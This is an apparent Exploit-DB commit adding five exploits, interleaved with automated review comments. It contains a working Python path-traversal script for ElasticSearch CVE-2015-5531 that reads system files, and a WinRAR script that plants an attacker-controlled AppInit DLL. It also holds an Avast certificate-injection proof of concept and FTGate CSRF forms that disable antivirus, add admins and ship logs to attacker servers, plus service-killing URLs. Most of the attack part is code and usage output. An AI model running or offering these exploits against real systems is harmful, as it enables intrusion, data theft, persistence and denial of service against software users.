DB: 2015-10-03

5 new exploits
Offensive Security 2015-10-03 05:02:57 +00:00
parent 09104c8692
commit e21a244644
6 changed files with 598 additions and 0 deletions

@ -34665,3 +34665,8 @@ id,file,description,date,author,platform,type,port
38375,platforms/php/webapps/38375.txt,"Asteriskguru Queue Statistics 'warning' Parameter Cross Site Scripting Vulnerability",2013-03-10,"Manuel García Cárdenas",php,webapps,0
38376,platforms/php/webapps/38376.txt,"WordPress podPress Plugin 'playerID' Parameter Cross Site Scripting Vulnerability",2013-03-11,hiphop,php,webapps,0
38377,platforms/php/webapps/38377.txt,"Privoxy Proxy Authentication Information Disclosure Vulnerabilities",2013-03-11,"Chris John Riley",php,webapps,0
38379,platforms/windows/webapps/38379.txt,"FTGate 2009 Build 6.4.00 - Multiple Vulnerabilities",2015-10-02,hyp3rlinx,windows,webapps,0
38380,platforms/windows/webapps/38380.txt,"FTGate 7 - CSRF Vulnerabilities",2015-10-02,hyp3rlinx,windows,webapps,0
38381,platforms/windows/local/38381.py,"WinRar < 5.30 beta 4 - Settings Import Command Execution",2015-10-02,R-73eN,windows,local,0
38383,platforms/linux/webapps/38383.py,"ElasticSearch 1.6.0 - Arbitrary File Download",2015-10-02,"Pedro Andujar",linux,webapps,9200
38384,platforms/windows/remote/38384.txt,"Avast Antivirus X.509 Error Rendering Command Execution",2015-10-02,"Google Security Research",windows,remote,0
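Review bot: rows 38375, 38376 and 38377 (the first three added lines) reference platforms/php/webapps/38375.txt, 38376.txt and 38377.txt, but none of those files is part of this commit ("6 changed files" is files.csv plus the five exploits 38379, 38380, 38381, 38383 and 38384), so the index will point at missing files until those entries are either added in a follow-up or dropped from this hunk. Minor: the 38377 Privoxy entry (a proxy, not a PHP application) is filed under platform php/webapps, and the 38384 Avast row is the only one in the hunk whose title carries no affected version, which makes it hard to triage from the CSV alone.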

platforms/linux/webapps/38383.py Executable file
@ -0,0 +1,123 @@
# elasticpwn Script for ElasticSearch url path traversal vuln. CVE-2015-5531
```
[crg@fogheaven elasticpwn]$ python CVE-2015-5531.py exploitlab.int /etc/hosts
!dSR script for CVE-2015-5531
127.0.0.1 localhost
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
ff02::3 ip6-allhosts
The script requires path.repo to be set into elasticsearch.yml and be writeable by elasticsearch process.
In order to bypass the snapshot- prefix setted in the server side, we need to create a known relative path:
curl http://exploitlab.int:9200/_snapshot/?pretty
{
"pwn" : {
"type" : "fs",
"settings" : {
"location" : "dsr"
}
},
"pwnie" : {
"type" : "fs",
"settings" : {
"location" : "dsr/snapshot-ev1l"
}
}
}
We will use it later to access through path traversal url:
trav = 'ev1l%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..'
The file content it's represented as an array of ints, that needs to be translated into human readable:
crg@exploitlab:~$ python elk-5531.py localhost /etc/issue
!dSR script for CVE-2015-5531
{u'status': 400, u'error': u'ElasticsearchParseException[Failed to derive xcontent from (offset=0, length=26): [85, 98, 117, 110, 116, 117, 32, 49, 50, 46, 48, 52, 46, 53, 32, 76, 84, 83, 32, 92, 110, 32, 92, 108, 10, 10]]'}
[85, 98, 117, 110, 116, 117, 32, 49, 50, 46, 48, 52, 46, 53, 32, 76, 84, 83, 32, 92, 110, 32, 92, 108, 10, 10] = Ubuntu 12.04.5 LTS \n \l
There is also a path disclosure that could help exploiting in some scenarios:
crg@exploitlab:~$ python elk-5531.py localhost /etc/passwda
!dSR script for CVE-2015-5531
{"error":"SnapshotMissingException[[pwn:dsr/../../../../../../../../etc/passwda] is missing]; nested: FileNotFoundException[/var/tmp/dsr/snapshot-dsr/../../../../../../../../etc/passwda (No such file or directory)]; ","status":404}
```
#!/usr/bin/env python
# PoC for CVE-2015-5531 - Reported by Benjamin Smith
# Affects ElasticSearch 1.6.0 and prior
# Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net
# Jose A. Guasch || twitter: @SecByDefault || jaguasch at gmail.com
# Tested on default Linux (.deb) install || requires path.repo: to be set on config file
import urllib, urllib2, json, sys, re
print "!dSR script for CVE-2015-5531\n"
if len(sys.argv) <> 3:
print "Ex: %s www.example.com /etc/passwd" % sys.argv[0]
sys.exit()
host = sys.argv[1]
fpath = urllib.quote(sys.argv[2], safe='')
port = 9200
trav = 'ev1l%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..'
reponame = 'pwn'
baseurl = "http://%s:%s/_snapshot/" % (host, port)
xplurl = '%s%s/%s%s' % (baseurl, reponame, trav, fpath)
def createSnapdirs():
try:
url = "%s/%s" % (baseurl, reponame)
request = urllib2.Request(url, data='{"type":"fs","settings":{"location":"dsr"}}')
request.get_method = lambda: 'POST'
urllib2.urlopen(request)
url = "%s/%sie" % (baseurl, reponame)
request = urllib2.Request(url, data='{"type":"fs","settings":{"location":"dsr/snapshot-ev1l"}}')
request.get_method = lambda: 'POST'
urllib2.urlopen(request)
except urllib2.HTTPError, e:
data = json.load(e)
print "[!] ERROR: Verify path.repo exist in config file, elasticsearch.yml:\n"
print str(data['error'])
sys.exit()
def grabFile(xplurl):
try:
urllib2.urlopen(xplurl)
except urllib2.HTTPError, e:
data = json.load(e)
extrdata = re.findall(r'\d+', str(data['error']))
decoder = bytearray()
for i in extrdata[+2:]:
decoder.append(int(i))
print decoder
def main():
createSnapdirs()
grabFile(xplurl)
if __name__ == "__main__":
main()
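Review bot: the file is not valid Python as committed: line 2 of the hunk is a bare ``` fence and lines 3 to 41 are a shell transcript and prose outside any comment, so `python 38383.py` stops with a SyntaxError before it ever reaches the shebang on line 42, and the Executable bit on the file does not help because the shebang is not on line 1. Move the usage notes into the header comment block (prefix each line with #) or into a separate README. Two smaller points: grabFile() only prints anything on the HTTPError path, so a 200 response or a connection-level URLError leaves it silent and a failed run looks the same as an empty file; and the script registers two snapshot repositories ("pwn" and "pwnie", location dsr/snapshot-ev1l) on the target and never removes them, which the header should mention, since those repository registrations and the SnapshotMissingException entries containing "../" paths shown in the transcript are exactly the artifacts an operator would look for in Elasticsearch logs after a run. Python 2-only syntax (`<>`, `except urllib2.HTTPError, e`, print statements) is fine for 2015 but worth stating in the header.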

@ -0,0 +1,54 @@
#!/usr/bin/python -w
# Title : WinRar Settings Import Command Execution
# Date : 02/10/2015
# Author : R-73eN
# Tested on : Windows 7 Ultimate
# Vulnerable Versions : Winrar < 5.30 beta 4
# The vulnerability exists in the "Import Settings From File" function.
# Since Settings file of Winrar are saved as a registry file and WinRar executes
# it in an automatic way without checking if it is writing to the Registry keys
# used by winrar, we can create a specially crafted settings file and we can
# overwrite registry keys.
# Since we have access to registry there are various ways we could use this to
# get code execution such as defining "RUN" keys or creating new services etc
# However the best way to get code execution is using AppInit DLLs
# AppInit DLLs are DLLs that are loaded into any process when it starts.
# In this case, we can specify a meterpreter DLL payload using a UNC path on
# an SMB server we control and then next time a new process starts we will
# get a shell.
# Read more about AppInit Dlls : https://support.microsoft.com/en-us/kb/197571
#
# Triggering the vulnerability
# 1) Run this python script.
# 2) Open WinRar
# 3) Click Options
# 4) Click Import/Export
# 5) Import Settings from file
# 6) Select the Specially crafted Settings.reg file
#
# Disclosure Timeline:
# 01/10/2015 - Vendor Contacted POC provided
# 02/10/2015 - Vendor released patch in WinRAR 5.30 beta 4 on to verify
# presence of [HKEY_CURRENT_USER\Software\WinRAR] or
# [HKEY_CURRENT_USER\Software\WinRAR\
#
#
banner = ""
banner +=" ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
print "[+] WinRar Settings Import Command Execution [+]\n"
dll = raw_input("[+] Enter dll location (smb) : ")
dll = dll.replace("\\","\\\\")
print "[+] Writing Contet To Settings.reg [+]"
evil = 'Windows Registry Editor Version 5.00\n\n[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]\n"AppInit_DLLs"="' + dll + '"\n"LoadAppInit_DLLs"=dword:00000001\n'
print evil
f = open("Settings.reg","w")
f.write(evil)
f.close()
print "[+] Settings.reg created successfully [+]"
print "\n https://www.infogen.al/ \n"
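Review bot: the shebang `#!/usr/bin/python -w` on line 1 is not a valid interpreter option (Python has `-W` with an argument, not `-w`), so on any system that honours the shebang the script aborts with "Unknown option: -w" before running; `#!/usr/bin/env python` is the usual form. The header also leaves out the privilege level required: the generated Settings.reg writes AppInit_DLLs and LoadAppInit_DLLs under HKEY_LOCAL_MACHINE, a hive that only administrators can modify by default, so the advisory should state that the WinRAR import has to run with administrative rights for those keys to change at all; that is also the point defenders should check, since an import that fails the HKLM write is not exploitable. Typo "Contet" in the status message on line 46, and the disclosure timeline entry for 02/10/2015 (lines 31 to 33) is cut off mid-sentence at "[HKEY_CURRENT_USER\Software\WinRAR\" and should be completed so the fix description is readable.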

@ -0,0 +1,12 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=546
Avast will render the commonName of X.509 certificates into an HTMLLayout frame when your MITM proxy detects a bad signature. Unbelievably, this means CN="<h1>really?!?!?</h1>" actually works, and is pretty simple to convert into remote code execution.
To verify this bug, I've attached a demo certificate for you. Please find attached key.pem, cert.pem and cert.der. Run this command to serve it from a machine with openssl:
$ sudo openssl s_server -key key.pem -cert cert.pem -accept 443
Then visit that https server from a machine with Avast installed. Click the message that appears to demonstrate launching calc.exe.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38384.zip
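Review bot: the advisory gives no affected or fixed Avast version and no patch reference, and the CSV row for 38384 carries none either, so a reader cannot tell whether a given install is still exposed; please add the affected build range or a link to the vendor fix. The text also refers to "attached" key.pem, cert.pem and cert.der, which in this tree exist only behind the external exploit-database-bin-sploits zip link on the last line; say so explicitly so the dependency on that archive is clear to anyone reading the .txt on its own.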

@ -0,0 +1,223 @@
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-FTGATE-2009-CSRF.txt
Vendor:
================================
www.ftgate.com
Product:
========================================
FTGate 2009 SR3 May 13 2010 Build 6.4.00
Vulnerability Type:
=================================
Cross site request forgery (CSRF)
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Multiple CSRF vectors exist within FTGate 2009 that allow us to add
arbitrary remote domains,
disable antivirus scanning for various Email file attachment types, and
finally change settings
to have archived server logs sent to our remote attacker controlled server
for safe keeping.
Exploit code(s):
===============
CSRF(s):
<!DOCTYPE>
<html>
<body onLoad="invertedcross()">
<script>
function invertedcross(){
var e=document.getElementById('PUNKSNOTDEAD')
e.submit()
}
</script>
1) add arbitrary domains:
-------------------------
<form id="PUNKSNOTDEAD" action="
http://localhost:8089/webadmin/mailboxes/index.fts?action=save"
method="post">
<input type="text" name="dname" value="hyp3rlinx.com" />
<input type="text" name="dtype" value="4" />
<input type="text" name="fname" value="*" />
<input type="text" name="action" value="domadd" />
<input type="text" name="domain" value="" />
<input type="text" name="newdomain" value="" />
</form>
2) sends archived logs to arbitrary remote server:
--------------------------------------------------
<form id="PUNKSNOTDEAD" action="
http://localhost:8089/webadmin/config/archive.fts?action=save"
method="post">
<input type="text" name="enable" value="on" />
<input type="text" name="path"
value="C%3A%5CProgram+Files+%28x86%29%5CFTGate+2009%5CArchive" />
<input type="text" name="duration" value="0" />
<input type="text" name="external" value="on" />
<input type="text" name="extarcserver" value="6.6.6.0" />
</form>
3) disable virus scan for .jar or .exe files etc:
-------------------------------------------------
Options to control handling of virus scanning for email attachments Virus
Scanning Mode
Operating mode of the virus scanner mode=0 to Disable Virus Scanning.
<form id="PUNKSNOTDEAD" action="
http://localhost:8089/webadmin/filters/virus.fts" method="post">
<input type="text" name="action" value="add" />
<input type="text" name="mode" value="0" />
<input type="text" name="extension" value="dll" />
</form>
</body>
</html>
Disclosure Timeline:
=========================================================
Vendor Notification: September 29, 2015
October 1, 2015 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
=========================================================
High
Description:
==========================================================
Request Method(s): [+] POST
Vulnerable Product: [+] FTGate 2009 SR3 May 13 2010 Build
6.4.00
Vulnerable Parameter(s): [+] domadd, extarcserver & mode
####################################################
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-FTGATE-2009-DOS.txt
Vendor:
================================
www.ftgate.com
Product:
================================
FTGate 2009 SR3 May 13 2010 Build 6.4.000
Vulnerability Type:
=======================
Denial of service (DOS)
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Multiple denial of service oppurtunities reside within FTGate 2009 that
allow us to disrupt and shut down
various FTGate services via GET requests by luring victimz to our website
or get them to click our malicious linxs.
Exploit code(s):
===============
DOS:
1) shutdown solight web mail interface on port 80
http://127.0.0.1:8089/webadmin/services/index.fts?action=stop_service&id=36
2) shutdown Monitor server port 8081
http://127.0.0.1:8089/webadmin/services/index.fts?action=stop_service&id=35
3) shutdown FTGate connector server port 8090 listens on address 'Any'
http://127.0.0.1:8089/webadmin/services/index.fts?action=stop_service&id=38
4) shutdown IMAP server port 143 listening on 'Any'
http://127.0.0.1:8089/webadmin/services/index.fts?action=stop_service&id=33
Disclosure Timeline:
=========================================================
Vendor Notification: September 29, 2015
October 1, 2015 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
=========================================================
Medium
Description:
==========================================================
Request Method(s): [+] GET
Vulnerable Product: [+] FTGate 2009 SR3 May 13 2010 Build
6.4.000
Vulnerable Parameter(s): [+] action, id
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
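Review bot: the three CSRF forms in the first advisory all carry id="PUNKSNOTDEAD" inside a single <html> document, so getElementById() in invertedcross() only ever returns the first form and the second and third never submit; the intent is evidently one form per page, and the file should state that rather than present them as one document. Consistency: the product build is "6.4.00" in the CSRF advisory and "6.4.000" in the DoS advisory for the same FTGate 2009 SR3 May 13 2010 release. In the Description block, "Vulnerable Parameter(s): domadd, extarcserver & mode" lists domadd, which is the value of the action parameter in form 1, not a parameter name. Spelling: "oppurtunities" in the DoS details.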

@ -0,0 +1,181 @@
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-FTGATE-V7-CSRF.txt
Vendor:
================================
www.ftgate.com
www.ftgate.com/ftgate-update-7-0-300
Product:
================================
FTGate v7
Vulnerability Type:
=================================
Cross site request forgery (CSRF)
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Multiple CSRF vectors exists within FTGate v7 allowing the following attacks
www.ftgate.com/ftgate-update-7-0-300
1) add arbitrary domains
2) enable arbitrary remote archiving of logs
3) whitelist arbitrary email addresses
4) add arbitrary mailbox & disable antivirus,
5) remove email attachment blocking for filez.
Exploit code(s):
===============
<!DOCTYPE>
<html>
<body onLoad="doit()">
<script>
function doit(){
var e=document.getElementById('HELL')
e.submit()
}
</script>
1) add arbitrary remote domain:
<form id='HELL' action="
http://localhost:8089/v7/wizards/adddomain.fts?action=save&id="
method="post">
<input type="text" name="name" value="abysmalgodz" />
<input type="text" name="type" value="1" />
</form>
2) enable arbitrary remote archive:
<form id='HELL' action="
http://localhost:8089/v7/webadmin/config/archive.fts?action=save"
method="post">
<input type="text" name="action" value="save" />
<input type="text" name="enable" value="on" />
<input type="text" name="duration" value="0" />
<input type="text" name="external" value="on" />
<input type="text" name="extarcserver" value="0.6.6.6" />
</form>
disable Antivirus for .exe files: also, has a persistent XSS inject but our
payload gets truncated at 5 chars,
but can corrupt the loading of valid XML returned from database to the WEB
UI.
e.g.
HTTP response after attack outputs corrupted XML generating errors.
<cell>exe</cell>
<cell/>
<cell><scri</cell>
<cell/>
</row>
<row id='id_"/><s'>
http://localhost:8089/v7/axml/adminlists.fts?table=ext&add=exe
<form id='HELL' action="
http://localhost:8089/v7/webadmin/filters/virus.fts?action=save&mailbox="
method="post">
<input type="text" name="mode" value="on" />
<input type="text" name="selftest" value="0ff" />
<input type="text" name="extGrid_id_exe_0" value="1" />
</form>
add arbitrary Admins:
http://localhost:8089/v7/axml/adminlists.fts?table=admin&add=ghostofsin
whitelist arbitrary email addresses:
Messages that originate from these email addresses are not filtered by the
Word or Phrase filters.
http://localhost:8089/v7/axml/whitelist.fts?id=531&add=hell@abyss.666
<!--remove email attachment blocking for exe, hta & html filez -->
http://localhost:8089/v7/axml/attachments.fts?id=531&remove=7,10,3
when access the above URL it returns XML with all file extensions blocked
on incoming email, we now know ID in database.
so to remove blocking of .cmd we select '11'
http://localhost:8089/v7/axml/attachments.fts?id=531&remove=11
or remove blocking of multiple file types in one shot
http://localhost:8089/v7/axml/attachments.fts?id=531&remove=7,10,3
add arbitrary mailbox:
<form id='HELL' action="
http://localhost:8089/v7/wizards/addmailbox.fts?action=save&id=500"
method="post">
<input type="text" name="name" value="punksnotdead" />
<input type="text" name="type" value="0" />
<input type="text" name="cn" value="punksnotdead" />
<input type="text" name="password" value="punksnotdead" />
</form>
</body>
</html>
Disclosure Timeline:
========================================
Vendor Notification: September 29, 2015
October 1, 2015 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
High
Description:
==========================================================
Request Method(s): [+] GET
Vulnerable Product: [+] FTGate v7
Vulnerable Parameter(s): [+] type, id, mode, add, extarcserver
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
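Review bot: the Description block says "Request Method(s): [+] GET", but four of the PoC forms (adddomain, archive, virus and addmailbox) use method="post"; the method list should read GET and POST so that triage maps correctly onto web-server logs. As in the 2009 advisory, every form shares id='HELL' in one document, so doit() only ever submits the first one. The axml URLs hardcode id=531 for whitelist.fts and attachments.fts without saying where that id comes from; the sentence "when access the above URL it returns XML ... we now know ID in database" should name the request that discloses it. Grammar and leftovers: "Multiple CSRF vectors exists" should be "exist", and the repeated www.ftgate.com/ftgate-update-7-0-300 line under Vulnerability Details looks like a paste leftover from the Vendor section.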